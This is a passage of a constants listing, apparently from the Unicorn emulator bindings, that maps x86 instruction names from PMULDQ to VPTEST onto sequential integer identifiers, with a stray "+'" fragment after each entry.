UC_X86_INS_PMULDQ = 567 +' UC_X86_INS_PMULHRW = 568 +' UC_X86_INS_PMULLD = 569 +' UC_X86_INS_POP = 570 +' UC_X86_INS_POPAW = 571 +' UC_X86_INS_POPAL = 572 +' UC_X86_INS_POPCNT = 573 +' UC_X86_INS_POPF = 574 +' UC_X86_INS_POPFD = 575 +' UC_X86_INS_POPFQ = 576 +' UC_X86_INS_PREFETCH = 577 +' UC_X86_INS_PREFETCHNTA = 578 +' UC_X86_INS_PREFETCHT0 = 579 +' UC_X86_INS_PREFETCHT1 = 580 +' UC_X86_INS_PREFETCHT2 = 581 +' UC_X86_INS_PREFETCHW = 582 +' UC_X86_INS_PSHUFD = 583 +' UC_X86_INS_PSHUFHW = 584 +' UC_X86_INS_PSHUFLW = 585 +' UC_X86_INS_PSLLDQ = 586 +' UC_X86_INS_PSRLDQ = 587 +' UC_X86_INS_PSWAPD = 588 +' UC_X86_INS_PTEST = 589 +' UC_X86_INS_PUNPCKHQDQ = 590 +' UC_X86_INS_PUNPCKLQDQ = 591 +' UC_X86_INS_PUSH = 592 +' UC_X86_INS_PUSHAW = 593 +' UC_X86_INS_PUSHAL = 594 +' UC_X86_INS_PUSHF = 595 +' UC_X86_INS_PUSHFD = 596 +' UC_X86_INS_PUSHFQ = 597 +' UC_X86_INS_RCL = 598 +' UC_X86_INS_RCPPS = 599 +' UC_X86_INS_RCPSS = 600 +' UC_X86_INS_RCR = 601 +' UC_X86_INS_RDFSBASE = 602 +' UC_X86_INS_RDGSBASE = 603 +' UC_X86_INS_RDMSR = 604 +' UC_X86_INS_RDPMC = 605 +' UC_X86_INS_RDRAND = 606 +' UC_X86_INS_RDSEED = 607 +' UC_X86_INS_RDTSC = 608 +' UC_X86_INS_RDTSCP = 609 +' UC_X86_INS_ROL = 610 +' UC_X86_INS_ROR = 611 +' UC_X86_INS_RORX = 612 +' UC_X86_INS_ROUNDPD = 613 +' UC_X86_INS_ROUNDPS = 614 +' UC_X86_INS_ROUNDSD = 615 +' UC_X86_INS_ROUNDSS = 616 +' UC_X86_INS_RSM = 617 +' UC_X86_INS_RSQRTPS = 618 +' UC_X86_INS_RSQRTSS = 619 +' UC_X86_INS_SAHF = 620 +' UC_X86_INS_SAL = 621 +' UC_X86_INS_SALC = 622 +' UC_X86_INS_SAR = 623 +' UC_X86_INS_SARX = 624 +' UC_X86_INS_SBB = 625 +' UC_X86_INS_SCASB = 626 +' UC_X86_INS_SCASD = 627 +' UC_X86_INS_SCASQ = 628 +' UC_X86_INS_SCASW = 629 +' UC_X86_INS_SETAE = 630 +' UC_X86_INS_SETA = 631 +' UC_X86_INS_SETBE = 632 +' UC_X86_INS_SETB = 633 +' UC_X86_INS_SETE = 634 +' UC_X86_INS_SETGE = 635 +' UC_X86_INS_SETG = 636 +' UC_X86_INS_SETLE = 637 +' UC_X86_INS_SETL = 638 +' UC_X86_INS_SETNE = 639 +' UC_X86_INS_SETNO = 640 +' UC_X86_INS_SETNP = 641 +' UC_X86_INS_SETNS = 642 +' UC_X86_INS_SETO = 643 +' UC_X86_INS_SETP = 644 +' UC_X86_INS_SETS = 645 +' UC_X86_INS_SFENCE = 646 +' UC_X86_INS_SGDT = 647 +' UC_X86_INS_SHA1MSG1 = 648 +' UC_X86_INS_SHA1MSG2 = 649 +' UC_X86_INS_SHA1NEXTE = 650 +' UC_X86_INS_SHA1RNDS4 = 651 +' UC_X86_INS_SHA256MSG1 = 652 +' UC_X86_INS_SHA256MSG2 = 653 +' UC_X86_INS_SHA256RNDS2 = 654 +' UC_X86_INS_SHL = 655 +' UC_X86_INS_SHLD = 656 +' UC_X86_INS_SHLX = 657 +' UC_X86_INS_SHR = 658 +' UC_X86_INS_SHRD = 659 +' UC_X86_INS_SHRX = 660 +' UC_X86_INS_SHUFPD = 661 +' UC_X86_INS_SHUFPS = 662 +' UC_X86_INS_SIDT = 663 +' UC_X86_INS_FSIN = 664 +' UC_X86_INS_SKINIT = 665 +' UC_X86_INS_SLDT = 666 +' UC_X86_INS_SMSW = 667 +' UC_X86_INS_SQRTPD = 668 +' UC_X86_INS_SQRTPS = 669 +' UC_X86_INS_SQRTSD = 670 +' UC_X86_INS_SQRTSS = 671 +' UC_X86_INS_FSQRT = 672 +' UC_X86_INS_STAC = 673 +' UC_X86_INS_STC = 674 +' UC_X86_INS_STD = 675 +' UC_X86_INS_STGI = 676 +' UC_X86_INS_STI = 677 +' UC_X86_INS_STMXCSR = 678 +' UC_X86_INS_STOSB = 679 +' UC_X86_INS_STOSD = 680 +' UC_X86_INS_STOSQ = 681 +' UC_X86_INS_STOSW = 682 +' UC_X86_INS_STR = 683 +' UC_X86_INS_FST = 684 +' UC_X86_INS_FSTP = 685 +' UC_X86_INS_FSTPNCE = 686 +' UC_X86_INS_FXCH = 687 +' UC_X86_INS_SUBPD = 688 +' UC_X86_INS_SUBPS = 689 +' UC_X86_INS_FSUBR = 690 +' UC_X86_INS_FISUBR = 691 +' UC_X86_INS_FSUBRP = 692 +' UC_X86_INS_SUBSD = 693 +' UC_X86_INS_SUBSS = 694 +' UC_X86_INS_FSUB = 695 +' UC_X86_INS_FISUB = 696 +' UC_X86_INS_FSUBP = 697 +' UC_X86_INS_SWAPGS = 698 +' UC_X86_INS_SYSCALL = 699 +' UC_X86_INS_SYSENTER = 700 +' UC_X86_INS_SYSEXIT = 701 +' UC_X86_INS_SYSRET = 702 +' UC_X86_INS_T1MSKC = 703 +' UC_X86_INS_TEST = 704 +' UC_X86_INS_UD2 = 705 +' UC_X86_INS_FTST = 706 +' UC_X86_INS_TZCNT = 707 +' UC_X86_INS_TZMSK = 708 +' UC_X86_INS_FUCOMPI = 709 +' UC_X86_INS_FUCOMI = 710 +' UC_X86_INS_FUCOMPP = 711 +' UC_X86_INS_FUCOMP = 712 +' UC_X86_INS_FUCOM = 713 +' UC_X86_INS_UD2B = 714 +' UC_X86_INS_UNPCKHPD = 715 +' UC_X86_INS_UNPCKHPS = 716 +' UC_X86_INS_UNPCKLPD = 717 +' UC_X86_INS_UNPCKLPS = 718 +' UC_X86_INS_VADDPD = 719 +' UC_X86_INS_VADDPS = 720 +' UC_X86_INS_VADDSD = 721 +' UC_X86_INS_VADDSS = 722 +' UC_X86_INS_VADDSUBPD = 723 +' UC_X86_INS_VADDSUBPS = 724 +' UC_X86_INS_VAESDECLAST = 725 +' UC_X86_INS_VAESDEC = 726 +' UC_X86_INS_VAESENCLAST = 727 +' UC_X86_INS_VAESENC = 728 +' UC_X86_INS_VAESIMC = 729 +' UC_X86_INS_VAESKEYGENASSIST = 730 +' UC_X86_INS_VALIGND = 731 +' UC_X86_INS_VALIGNQ = 732 +' UC_X86_INS_VANDNPD = 733 +' UC_X86_INS_VANDNPS = 734 +' UC_X86_INS_VANDPD = 735 +' UC_X86_INS_VANDPS = 736 +' UC_X86_INS_VBLENDMPD = 737 +' UC_X86_INS_VBLENDMPS = 738 +' UC_X86_INS_VBLENDPD = 739 +' UC_X86_INS_VBLENDPS = 740 +' UC_X86_INS_VBLENDVPD = 741 +' UC_X86_INS_VBLENDVPS = 742 +' UC_X86_INS_VBROADCASTF128 = 743 +' UC_X86_INS_VBROADCASTI32X4 = 744 +' UC_X86_INS_VBROADCASTI64X4 = 745 +' UC_X86_INS_VBROADCASTSD = 746 +' UC_X86_INS_VBROADCASTSS = 747 +' UC_X86_INS_VCMPPD = 748 +' UC_X86_INS_VCMPPS = 749 +' UC_X86_INS_VCMPSD = 750 +' UC_X86_INS_VCMPSS = 751 +' UC_X86_INS_VCOMPRESSPD = 752 +' UC_X86_INS_VCOMPRESSPS = 753 +' UC_X86_INS_VCVTDQ2PD = 754 +' UC_X86_INS_VCVTDQ2PS = 755 +' UC_X86_INS_VCVTPD2DQX = 756 +' UC_X86_INS_VCVTPD2DQ = 757 +' UC_X86_INS_VCVTPD2PSX = 758 +' UC_X86_INS_VCVTPD2PS = 759 +' UC_X86_INS_VCVTPD2UDQ = 760 +' UC_X86_INS_VCVTPH2PS = 761 +' UC_X86_INS_VCVTPS2DQ = 762 +' UC_X86_INS_VCVTPS2PD = 763 +' UC_X86_INS_VCVTPS2PH = 764 +' UC_X86_INS_VCVTPS2UDQ = 765 +' UC_X86_INS_VCVTSD2SI = 766 +' UC_X86_INS_VCVTSD2USI = 767 +' UC_X86_INS_VCVTSS2SI = 768 +' UC_X86_INS_VCVTSS2USI = 769 +' UC_X86_INS_VCVTTPD2DQX = 770 +' UC_X86_INS_VCVTTPD2DQ = 771 +' UC_X86_INS_VCVTTPD2UDQ = 772 +' UC_X86_INS_VCVTTPS2DQ = 773 +' UC_X86_INS_VCVTTPS2UDQ = 774 +' UC_X86_INS_VCVTUDQ2PD = 775 +' UC_X86_INS_VCVTUDQ2PS = 776 +' UC_X86_INS_VDIVPD = 777 +' UC_X86_INS_VDIVPS = 778 +' UC_X86_INS_VDIVSD = 779 +' UC_X86_INS_VDIVSS = 780 +' UC_X86_INS_VDPPD = 781 +' UC_X86_INS_VDPPS = 782 +' UC_X86_INS_VERR = 783 +' UC_X86_INS_VERW = 784 +' UC_X86_INS_VEXP2PD = 785 +' UC_X86_INS_VEXP2PS = 786 +' UC_X86_INS_VEXPANDPD = 787 +' UC_X86_INS_VEXPANDPS = 788 +' UC_X86_INS_VEXTRACTF128 = 789 +' UC_X86_INS_VEXTRACTF32X4 = 790 +' UC_X86_INS_VEXTRACTF64X4 = 791 +' UC_X86_INS_VEXTRACTI128 = 792 +' UC_X86_INS_VEXTRACTI32X4 = 793 +' UC_X86_INS_VEXTRACTI64X4 = 794 +' UC_X86_INS_VEXTRACTPS = 795 +' UC_X86_INS_VFMADD132PD = 796 +' UC_X86_INS_VFMADD132PS = 797 +' UC_X86_INS_VFMADDPD = 798 +' UC_X86_INS_VFMADD213PD = 799 +' UC_X86_INS_VFMADD231PD = 800 +' UC_X86_INS_VFMADDPS = 801 +' UC_X86_INS_VFMADD213PS = 802 +' UC_X86_INS_VFMADD231PS = 803 +' UC_X86_INS_VFMADDSD = 804 +' UC_X86_INS_VFMADD213SD = 805 +' UC_X86_INS_VFMADD132SD = 806 +' UC_X86_INS_VFMADD231SD = 807 +' UC_X86_INS_VFMADDSS = 808 +' UC_X86_INS_VFMADD213SS = 809 +' UC_X86_INS_VFMADD132SS = 810 +' UC_X86_INS_VFMADD231SS = 811 +' UC_X86_INS_VFMADDSUB132PD = 812 +' UC_X86_INS_VFMADDSUB132PS = 813 +' UC_X86_INS_VFMADDSUBPD = 814 +' UC_X86_INS_VFMADDSUB213PD = 815 +' UC_X86_INS_VFMADDSUB231PD = 816 +' UC_X86_INS_VFMADDSUBPS = 817 +' UC_X86_INS_VFMADDSUB213PS = 818 +' UC_X86_INS_VFMADDSUB231PS = 819 +' UC_X86_INS_VFMSUB132PD = 820 +' UC_X86_INS_VFMSUB132PS = 821 +' UC_X86_INS_VFMSUBADD132PD = 822 +' UC_X86_INS_VFMSUBADD132PS = 823 +' UC_X86_INS_VFMSUBADDPD = 824 +' UC_X86_INS_VFMSUBADD213PD = 825 +' UC_X86_INS_VFMSUBADD231PD = 826 +' UC_X86_INS_VFMSUBADDPS = 827 +' UC_X86_INS_VFMSUBADD213PS = 828 +' UC_X86_INS_VFMSUBADD231PS = 829 +' UC_X86_INS_VFMSUBPD = 830 +' UC_X86_INS_VFMSUB213PD = 831 +' UC_X86_INS_VFMSUB231PD = 832 +' UC_X86_INS_VFMSUBPS = 833 +' UC_X86_INS_VFMSUB213PS = 834 +' UC_X86_INS_VFMSUB231PS = 835 +' UC_X86_INS_VFMSUBSD = 836 +' UC_X86_INS_VFMSUB213SD = 837 +' UC_X86_INS_VFMSUB132SD = 838 +' UC_X86_INS_VFMSUB231SD = 839 +' UC_X86_INS_VFMSUBSS = 840 +' UC_X86_INS_VFMSUB213SS = 841 +' UC_X86_INS_VFMSUB132SS = 842 +' UC_X86_INS_VFMSUB231SS = 843 +' UC_X86_INS_VFNMADD132PD = 844 +' UC_X86_INS_VFNMADD132PS = 845 +' UC_X86_INS_VFNMADDPD = 846 +' UC_X86_INS_VFNMADD213PD = 847 +' UC_X86_INS_VFNMADD231PD = 848 +' UC_X86_INS_VFNMADDPS = 849 +' UC_X86_INS_VFNMADD213PS = 850 +' UC_X86_INS_VFNMADD231PS = 851 +' UC_X86_INS_VFNMADDSD = 852 +' UC_X86_INS_VFNMADD213SD = 853 +' UC_X86_INS_VFNMADD132SD = 854 +' UC_X86_INS_VFNMADD231SD = 855 +' UC_X86_INS_VFNMADDSS = 856 +' UC_X86_INS_VFNMADD213SS = 857 +' UC_X86_INS_VFNMADD132SS = 858 +' UC_X86_INS_VFNMADD231SS = 859 +' UC_X86_INS_VFNMSUB132PD = 860 +' UC_X86_INS_VFNMSUB132PS = 861 +' UC_X86_INS_VFNMSUBPD = 862 +' UC_X86_INS_VFNMSUB213PD = 863 +' UC_X86_INS_VFNMSUB231PD = 864 +' UC_X86_INS_VFNMSUBPS = 865 +' UC_X86_INS_VFNMSUB213PS = 866 +' UC_X86_INS_VFNMSUB231PS = 867 +' UC_X86_INS_VFNMSUBSD = 868 +' UC_X86_INS_VFNMSUB213SD = 869 +' UC_X86_INS_VFNMSUB132SD = 870 +' UC_X86_INS_VFNMSUB231SD = 871 +' UC_X86_INS_VFNMSUBSS = 872 +' UC_X86_INS_VFNMSUB213SS = 873 +' UC_X86_INS_VFNMSUB132SS = 874 +' UC_X86_INS_VFNMSUB231SS = 875 +' UC_X86_INS_VFRCZPD = 876 +' UC_X86_INS_VFRCZPS = 877 +' UC_X86_INS_VFRCZSD = 878 +' UC_X86_INS_VFRCZSS = 879 +' UC_X86_INS_VORPD = 880 +' UC_X86_INS_VORPS = 881 +' UC_X86_INS_VXORPD = 882 +' UC_X86_INS_VXORPS = 883 +' UC_X86_INS_VGATHERDPD = 884 +' UC_X86_INS_VGATHERDPS = 885 +' UC_X86_INS_VGATHERPF0DPD = 886 +' UC_X86_INS_VGATHERPF0DPS = 887 +' UC_X86_INS_VGATHERPF0QPD = 888 +' UC_X86_INS_VGATHERPF0QPS = 889 +' UC_X86_INS_VGATHERPF1DPD = 890 +' UC_X86_INS_VGATHERPF1DPS = 891 +' UC_X86_INS_VGATHERPF1QPD = 892 +' UC_X86_INS_VGATHERPF1QPS = 893 +' UC_X86_INS_VGATHERQPD = 894 +' UC_X86_INS_VGATHERQPS = 895 +' UC_X86_INS_VHADDPD = 896 +' UC_X86_INS_VHADDPS = 897 +' UC_X86_INS_VHSUBPD = 898 +' UC_X86_INS_VHSUBPS = 899 +' UC_X86_INS_VINSERTF128 = 900 +' UC_X86_INS_VINSERTF32X4 = 901 +' UC_X86_INS_VINSERTF32X8 = 902 +' UC_X86_INS_VINSERTF64X2 = 903 +' UC_X86_INS_VINSERTF64X4 = 904 +' UC_X86_INS_VINSERTI128 = 905 +' UC_X86_INS_VINSERTI32X4 = 906 +' UC_X86_INS_VINSERTI32X8 = 907 +' UC_X86_INS_VINSERTI64X2 = 908 +' UC_X86_INS_VINSERTI64X4 = 909 +' UC_X86_INS_VINSERTPS = 910 +' UC_X86_INS_VLDDQU = 911 +' UC_X86_INS_VLDMXCSR = 912 +' UC_X86_INS_VMASKMOVDQU = 913 +' UC_X86_INS_VMASKMOVPD = 914 +' UC_X86_INS_VMASKMOVPS = 915 +' UC_X86_INS_VMAXPD = 916 +' UC_X86_INS_VMAXPS = 917 +' UC_X86_INS_VMAXSD = 918 +' UC_X86_INS_VMAXSS = 919 +' UC_X86_INS_VMCALL = 920 +' UC_X86_INS_VMCLEAR = 921 +' UC_X86_INS_VMFUNC = 922 +' UC_X86_INS_VMINPD = 923 +' UC_X86_INS_VMINPS = 924 +' UC_X86_INS_VMINSD = 925 +' UC_X86_INS_VMINSS = 926 +' UC_X86_INS_VMLAUNCH = 927 +' UC_X86_INS_VMLOAD = 928 +' UC_X86_INS_VMMCALL = 929 +' UC_X86_INS_VMOVQ = 930 +' UC_X86_INS_VMOVDDUP = 931 +' UC_X86_INS_VMOVD = 932 +' UC_X86_INS_VMOVDQA32 = 933 +' UC_X86_INS_VMOVDQA64 = 934 +' UC_X86_INS_VMOVDQA = 935 +' UC_X86_INS_VMOVDQU16 = 936 +' UC_X86_INS_VMOVDQU32 = 937 +' UC_X86_INS_VMOVDQU64 = 938 +' UC_X86_INS_VMOVDQU8 = 939 +' UC_X86_INS_VMOVDQU = 940 +' UC_X86_INS_VMOVHLPS = 941 +' UC_X86_INS_VMOVHPD = 942 +' UC_X86_INS_VMOVHPS = 943 +' UC_X86_INS_VMOVLHPS = 944 +' UC_X86_INS_VMOVLPD = 945 +' UC_X86_INS_VMOVLPS = 946 +' UC_X86_INS_VMOVMSKPD = 947 +' UC_X86_INS_VMOVMSKPS = 948 +' UC_X86_INS_VMOVNTDQA = 949 +' UC_X86_INS_VMOVNTDQ = 950 +' UC_X86_INS_VMOVNTPD = 951 +' UC_X86_INS_VMOVNTPS = 952 +' UC_X86_INS_VMOVSD = 953 +' UC_X86_INS_VMOVSHDUP = 954 +' UC_X86_INS_VMOVSLDUP = 955 +' UC_X86_INS_VMOVSS = 956 +' UC_X86_INS_VMOVUPD = 957 +' UC_X86_INS_VMOVUPS = 958 +' UC_X86_INS_VMPSADBW = 959 +' UC_X86_INS_VMPTRLD = 960 +' UC_X86_INS_VMPTRST = 961 +' UC_X86_INS_VMREAD = 962 +' UC_X86_INS_VMRESUME = 963 +' UC_X86_INS_VMRUN = 964 +' UC_X86_INS_VMSAVE = 965 +' UC_X86_INS_VMULPD = 966 +' UC_X86_INS_VMULPS = 967 +' UC_X86_INS_VMULSD = 968 +' UC_X86_INS_VMULSS = 969 +' UC_X86_INS_VMWRITE = 970 +' UC_X86_INS_VMXOFF = 971 +' UC_X86_INS_VMXON = 972 +' UC_X86_INS_VPABSB = 973 +' UC_X86_INS_VPABSD = 974 +' UC_X86_INS_VPABSQ = 975 +' UC_X86_INS_VPABSW = 976 +' UC_X86_INS_VPACKSSDW = 977 +' UC_X86_INS_VPACKSSWB = 978 +' UC_X86_INS_VPACKUSDW = 979 +' UC_X86_INS_VPACKUSWB = 980 +' UC_X86_INS_VPADDB = 981 +' UC_X86_INS_VPADDD = 982 +' UC_X86_INS_VPADDQ = 983 +' UC_X86_INS_VPADDSB = 984 +' UC_X86_INS_VPADDSW = 985 +' UC_X86_INS_VPADDUSB = 986 +' UC_X86_INS_VPADDUSW = 987 +' UC_X86_INS_VPADDW = 988 +' UC_X86_INS_VPALIGNR = 989 +' UC_X86_INS_VPANDD = 990 +' UC_X86_INS_VPANDND = 991 +' UC_X86_INS_VPANDNQ = 992 +' UC_X86_INS_VPANDN = 993 +' UC_X86_INS_VPANDQ = 994 +' UC_X86_INS_VPAND = 995 +' UC_X86_INS_VPAVGB = 996 +' UC_X86_INS_VPAVGW = 997 +' UC_X86_INS_VPBLENDD = 998 +' UC_X86_INS_VPBLENDMB = 999 +' UC_X86_INS_VPBLENDMD = 1000 +' UC_X86_INS_VPBLENDMQ = 1001 +' UC_X86_INS_VPBLENDMW = 1002 +' UC_X86_INS_VPBLENDVB = 1003 +' UC_X86_INS_VPBLENDW = 1004 +' UC_X86_INS_VPBROADCASTB = 1005 +' UC_X86_INS_VPBROADCASTD = 1006 +' UC_X86_INS_VPBROADCASTMB2Q = 1007 +' UC_X86_INS_VPBROADCASTMW2D = 1008 +' UC_X86_INS_VPBROADCASTQ = 1009 +' UC_X86_INS_VPBROADCASTW = 1010 +' UC_X86_INS_VPCLMULQDQ = 1011 +' UC_X86_INS_VPCMOV = 1012 +' UC_X86_INS_VPCMPB = 1013 +' UC_X86_INS_VPCMPD = 1014 +' UC_X86_INS_VPCMPEQB = 1015 +' UC_X86_INS_VPCMPEQD = 1016 +' UC_X86_INS_VPCMPEQQ = 1017 +' UC_X86_INS_VPCMPEQW = 1018 +' UC_X86_INS_VPCMPESTRI = 1019 +' UC_X86_INS_VPCMPESTRM = 1020 +' UC_X86_INS_VPCMPGTB = 1021 +' UC_X86_INS_VPCMPGTD = 1022 +' UC_X86_INS_VPCMPGTQ = 1023 +' UC_X86_INS_VPCMPGTW = 1024 +' UC_X86_INS_VPCMPISTRI = 1025 +' UC_X86_INS_VPCMPISTRM = 1026 +' UC_X86_INS_VPCMPQ = 1027 +' UC_X86_INS_VPCMPUB = 1028 +' UC_X86_INS_VPCMPUD = 1029 +' UC_X86_INS_VPCMPUQ = 1030 +' UC_X86_INS_VPCMPUW = 1031 +' UC_X86_INS_VPCMPW = 1032 +' UC_X86_INS_VPCOMB = 1033 +' UC_X86_INS_VPCOMD = 1034 +' UC_X86_INS_VPCOMPRESSD = 1035 +' UC_X86_INS_VPCOMPRESSQ = 1036 +' UC_X86_INS_VPCOMQ = 1037 +' UC_X86_INS_VPCOMUB = 1038 +' UC_X86_INS_VPCOMUD = 1039 +' UC_X86_INS_VPCOMUQ = 1040 +' UC_X86_INS_VPCOMUW = 1041 +' UC_X86_INS_VPCOMW = 1042 +' UC_X86_INS_VPCONFLICTD = 1043 +' UC_X86_INS_VPCONFLICTQ = 1044 +' UC_X86_INS_VPERM2F128 = 1045 +' UC_X86_INS_VPERM2I128 = 1046 +' UC_X86_INS_VPERMD = 1047 +' UC_X86_INS_VPERMI2D = 1048 +' UC_X86_INS_VPERMI2PD = 1049 +' UC_X86_INS_VPERMI2PS = 1050 +' UC_X86_INS_VPERMI2Q = 1051 +' UC_X86_INS_VPERMIL2PD = 1052 +' UC_X86_INS_VPERMIL2PS = 1053 +' UC_X86_INS_VPERMILPD = 1054 +' UC_X86_INS_VPERMILPS = 1055 +' UC_X86_INS_VPERMPD = 1056 +' UC_X86_INS_VPERMPS = 1057 +' UC_X86_INS_VPERMQ = 1058 +' UC_X86_INS_VPERMT2D = 1059 +' UC_X86_INS_VPERMT2PD = 1060 +' UC_X86_INS_VPERMT2PS = 1061 +' UC_X86_INS_VPERMT2Q = 1062 +' UC_X86_INS_VPEXPANDD = 1063 +' UC_X86_INS_VPEXPANDQ = 1064 +' UC_X86_INS_VPEXTRB = 1065 +' UC_X86_INS_VPEXTRD = 1066 +' UC_X86_INS_VPEXTRQ = 1067 +' UC_X86_INS_VPEXTRW = 1068 +' UC_X86_INS_VPGATHERDD = 1069 +' UC_X86_INS_VPGATHERDQ = 1070 +' UC_X86_INS_VPGATHERQD = 1071 +' UC_X86_INS_VPGATHERQQ = 1072 +' UC_X86_INS_VPHADDBD = 1073 +' UC_X86_INS_VPHADDBQ = 1074 +' UC_X86_INS_VPHADDBW = 1075 +' UC_X86_INS_VPHADDDQ = 1076 +' UC_X86_INS_VPHADDD = 1077 +' UC_X86_INS_VPHADDSW = 1078 +' UC_X86_INS_VPHADDUBD = 1079 +' UC_X86_INS_VPHADDUBQ = 1080 +' UC_X86_INS_VPHADDUBW = 1081 +' UC_X86_INS_VPHADDUDQ = 1082 +' UC_X86_INS_VPHADDUWD = 1083 +' UC_X86_INS_VPHADDUWQ = 1084 +' UC_X86_INS_VPHADDWD = 1085 +' UC_X86_INS_VPHADDWQ = 1086 +' UC_X86_INS_VPHADDW = 1087 +' UC_X86_INS_VPHMINPOSUW = 1088 +' UC_X86_INS_VPHSUBBW = 1089 +' UC_X86_INS_VPHSUBDQ = 1090 +' UC_X86_INS_VPHSUBD = 1091 +' UC_X86_INS_VPHSUBSW = 1092 +' UC_X86_INS_VPHSUBWD = 1093 +' UC_X86_INS_VPHSUBW = 1094 +' UC_X86_INS_VPINSRB = 1095 +' UC_X86_INS_VPINSRD = 1096 +' UC_X86_INS_VPINSRQ = 1097 +' UC_X86_INS_VPINSRW = 1098 +' UC_X86_INS_VPLZCNTD = 1099 +' UC_X86_INS_VPLZCNTQ = 1100 +' UC_X86_INS_VPMACSDD = 1101 +' UC_X86_INS_VPMACSDQH = 1102 +' UC_X86_INS_VPMACSDQL = 1103 +' UC_X86_INS_VPMACSSDD = 1104 +' UC_X86_INS_VPMACSSDQH = 1105 +' UC_X86_INS_VPMACSSDQL = 1106 +' UC_X86_INS_VPMACSSWD = 1107 +' UC_X86_INS_VPMACSSWW = 1108 +' UC_X86_INS_VPMACSWD = 1109 +' UC_X86_INS_VPMACSWW = 1110 +' UC_X86_INS_VPMADCSSWD = 1111 +' UC_X86_INS_VPMADCSWD = 1112 +' UC_X86_INS_VPMADDUBSW = 1113 +' UC_X86_INS_VPMADDWD = 1114 +' UC_X86_INS_VPMASKMOVD = 1115 +' UC_X86_INS_VPMASKMOVQ = 1116 +' UC_X86_INS_VPMAXSB = 1117 +' UC_X86_INS_VPMAXSD = 1118 +' UC_X86_INS_VPMAXSQ = 1119 +' UC_X86_INS_VPMAXSW = 1120 +' UC_X86_INS_VPMAXUB = 1121 +' UC_X86_INS_VPMAXUD = 1122 +' UC_X86_INS_VPMAXUQ = 1123 +' UC_X86_INS_VPMAXUW = 1124 +' UC_X86_INS_VPMINSB = 1125 +' UC_X86_INS_VPMINSD = 1126 +' UC_X86_INS_VPMINSQ = 1127 +' UC_X86_INS_VPMINSW = 1128 +' UC_X86_INS_VPMINUB = 1129 +' UC_X86_INS_VPMINUD = 1130 +' UC_X86_INS_VPMINUQ = 1131 +' UC_X86_INS_VPMINUW = 1132 +' UC_X86_INS_VPMOVDB = 1133 +' UC_X86_INS_VPMOVDW = 1134 +' UC_X86_INS_VPMOVM2B = 1135 +' UC_X86_INS_VPMOVM2D = 1136 +' UC_X86_INS_VPMOVM2Q = 1137 +' UC_X86_INS_VPMOVM2W = 1138 +' UC_X86_INS_VPMOVMSKB = 1139 +' UC_X86_INS_VPMOVQB = 1140 +' UC_X86_INS_VPMOVQD = 1141 +' UC_X86_INS_VPMOVQW = 1142 +' UC_X86_INS_VPMOVSDB = 1143 +' UC_X86_INS_VPMOVSDW = 1144 +' UC_X86_INS_VPMOVSQB = 1145 +' UC_X86_INS_VPMOVSQD = 1146 +' UC_X86_INS_VPMOVSQW = 1147 +' UC_X86_INS_VPMOVSXBD = 1148 +' UC_X86_INS_VPMOVSXBQ = 1149 +' UC_X86_INS_VPMOVSXBW = 1150 +' UC_X86_INS_VPMOVSXDQ = 1151 +' UC_X86_INS_VPMOVSXWD = 1152 +' UC_X86_INS_VPMOVSXWQ = 1153 +' UC_X86_INS_VPMOVUSDB = 1154 +' UC_X86_INS_VPMOVUSDW = 1155 +' UC_X86_INS_VPMOVUSQB = 1156 +' UC_X86_INS_VPMOVUSQD = 1157 +' UC_X86_INS_VPMOVUSQW = 1158 +' UC_X86_INS_VPMOVZXBD = 1159 +' UC_X86_INS_VPMOVZXBQ = 1160 +' UC_X86_INS_VPMOVZXBW = 1161 +' UC_X86_INS_VPMOVZXDQ = 1162 +' UC_X86_INS_VPMOVZXWD = 1163 +' UC_X86_INS_VPMOVZXWQ = 1164 +' UC_X86_INS_VPMULDQ = 1165 +' UC_X86_INS_VPMULHRSW = 1166 +' UC_X86_INS_VPMULHUW = 1167 +' UC_X86_INS_VPMULHW = 1168 +' UC_X86_INS_VPMULLD = 1169 +' UC_X86_INS_VPMULLQ = 1170 +' UC_X86_INS_VPMULLW = 1171 +' UC_X86_INS_VPMULUDQ = 1172 +' UC_X86_INS_VPORD = 1173 +' UC_X86_INS_VPORQ = 1174 +' UC_X86_INS_VPOR = 1175 +' UC_X86_INS_VPPERM = 1176 +' UC_X86_INS_VPROTB = 1177 +' UC_X86_INS_VPROTD = 1178 +' UC_X86_INS_VPROTQ = 1179 +' UC_X86_INS_VPROTW = 1180 +' UC_X86_INS_VPSADBW = 1181 +' UC_X86_INS_VPSCATTERDD = 1182 +' UC_X86_INS_VPSCATTERDQ = 1183 +' UC_X86_INS_VPSCATTERQD = 1184 +' UC_X86_INS_VPSCATTERQQ = 1185 +' UC_X86_INS_VPSHAB = 1186 +' UC_X86_INS_VPSHAD = 1187 +' UC_X86_INS_VPSHAQ = 1188 +' UC_X86_INS_VPSHAW = 1189 +' UC_X86_INS_VPSHLB = 1190 +' UC_X86_INS_VPSHLD = 1191 +' UC_X86_INS_VPSHLQ = 1192 +' UC_X86_INS_VPSHLW = 1193 +' UC_X86_INS_VPSHUFB = 1194 +' UC_X86_INS_VPSHUFD = 1195 +' UC_X86_INS_VPSHUFHW = 1196 +' UC_X86_INS_VPSHUFLW = 1197 +' UC_X86_INS_VPSIGNB = 1198 +' UC_X86_INS_VPSIGND = 1199 +' UC_X86_INS_VPSIGNW = 1200 +' UC_X86_INS_VPSLLDQ = 1201 +' UC_X86_INS_VPSLLD = 1202 +' UC_X86_INS_VPSLLQ = 1203 +' UC_X86_INS_VPSLLVD = 1204 +' UC_X86_INS_VPSLLVQ = 1205 +' UC_X86_INS_VPSLLW = 1206 +' UC_X86_INS_VPSRAD = 1207 +' UC_X86_INS_VPSRAQ = 1208 +' UC_X86_INS_VPSRAVD = 1209 +' UC_X86_INS_VPSRAVQ = 1210 +' UC_X86_INS_VPSRAW = 1211 +' UC_X86_INS_VPSRLDQ = 1212 +' UC_X86_INS_VPSRLD = 1213 +' UC_X86_INS_VPSRLQ = 1214 +' UC_X86_INS_VPSRLVD = 1215 +' UC_X86_INS_VPSRLVQ = 1216 +' UC_X86_INS_VPSRLW = 1217 +' UC_X86_INS_VPSUBB = 1218 +' UC_X86_INS_VPSUBD = 1219 +' UC_X86_INS_VPSUBQ = 1220 +' UC_X86_INS_VPSUBSB = 1221 +' UC_X86_INS_VPSUBSW = 1222 +' UC_X86_INS_VPSUBUSB = 1223 +' UC_X86_INS_VPSUBUSW = 1224 +' UC_X86_INS_VPSUBW = 1225 +' UC_X86_INS_VPTESTMD = 1226 +' UC_X86_INS_VPTESTMQ = 1227 +' UC_X86_INS_VPTESTNMD = 1228 +' UC_X86_INS_VPTESTNMQ = 1229 +' UC_X86_INS_VPTEST = 1230 +' 